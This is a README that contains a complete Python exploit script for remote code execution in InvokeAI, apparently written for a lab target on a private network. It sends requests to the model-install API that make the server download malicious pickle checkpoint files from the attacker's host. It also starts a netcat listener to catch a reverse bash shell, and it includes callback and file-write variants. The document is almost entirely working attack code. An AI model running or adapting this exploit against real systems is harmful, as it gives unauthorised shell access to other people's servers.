README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Kali Reverse Shell Test - Alternative to SSH
Copy to Kali and run: python3 kali_reverse_test.py
"""
import requests
import time
import threading
import subprocess
import socket
def start_netcat_listener():
"""Start netcat listener in background"""
try:
print("[*] Starting netcat listener on port 4444...")
# This will run in background
subprocess.Popen(['nc', '-lvnp', '4444'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
print("[+] Netcat listener started on port 4444")
return True
except:
print("[-] Could not start netcat listener")
return False
def test_callback_payload():
"""Test callback payload to verify deserialization"""
print("\n" + "="*50)
print("TESTING CALLBACK PAYLOAD")
print("This will make HTTP callback to verify execution")
print("="*50)
url = "http://192.168.117.218:9090/api/v2/models/install"
params = {
"source": "http://192.168.45.168:8000/payload_callback_test.ckpt",
"inplace": "true"
}
print(f"[*] Sending callback payload...")
response = requests.post(url, params=params, json={})
print(f"[+] Status: {response.status_code}")
if response.status_code in [200, 201, 202]:
print("[+] Callback payload sent!")
print("[!] Check your web server logs for callback request")
print("[!] If you see callback, pickle deserialization is working")
return True
else:
print("[-] Failed")
return False
def test_reverse_shell():
"""Test reverse shell payload"""
print("\n" + "="*50)
print("TESTING REVERSE SHELL PAYLOAD")
print("Make sure netcat listener is running: nc -lvnp 4444")
print("="*50)
url = "http://192.168.117.218:9090/api/v2/models/install"
params = {
"source": "http://192.168.45.168:8000/payload_reverse_bash.ckpt",
"inplace": "true"
}
print(f"[*] Sending reverse shell payload...")
print("[*] This should connect back to your netcat listener")
response = requests.post(url, params=params, json={})
print(f"[+] Status: {response.status_code}")
if response.status_code in [200, 201, 202]:
print("[+] Reverse shell payload sent!")
print("[!] Check your netcat listener for connection")
print("[!] If connected, you have shell access!")
return True
else:
print("[-] Failed")
return False
def test_simple_execution():
"""Test simple command execution"""
print("\n" + "="*50)
print("TESTING SIMPLE EXECUTION")
print("Creating test file to verify command execution")
print("="*50)
url = "http://192.168.117.218:9090/api/v2/models/install"
params = {
"source": "http://192.168.45.168:8000/payload_test.ckpt",
"inplace": "true"
}
print(f"[*] Sending test payload...")
response = requests.post(url, params=params, json={})
print(f"[+] Status: {response.status_code}")
if response.status_code in [200, 201, 202]:
print("[+] Test payload sent!")
print("[!] Check if file was created:")
print("ssh [email protected] 'cat /tmp/payload_test.txt'")
return True
else:
print("[-] Failed")
return False
def main():
print("InvokeAI RCE - Reverse Shell & Execution Test")
print("=" * 50)
print("Testing alternative approaches since SSH key injection failed")
# Start netcat listener
listener_started = start_netcat_listener()
print("\nChoose test:")
print("1. Test callback payload (verifies deserialization)")
print("2. Test reverse shell (get shell directly)")
print("3. Test simple execution (verify commands work)")
print("4. Run all tests")
choice = input("\nEnter choice (1-4): ").strip()
if choice == "1":
test_callback_payload()
elif choice == "2":
if not listener_started:
print("[!] Please start listener manually: nc -lvnp 4444")
test_reverse_shell()
elif choice == "3":
test_simple_execution()
elif choice == "4":
test_callback_payload()
time.sleep(2)
test_reverse_shell()
time.sleep(2)
test_simple_execution()
else:
print("Invalid choice")
print("\n" + "="*50)
print("MANUAL VERIFICATION:")
print("1. Check web server logs for callback")
print("2. Check netcat listener for shell")
print("3. Check test file: ssh [email protected] 'cat /tmp/payload_test.txt'")
if __name__ == "__main__":
main()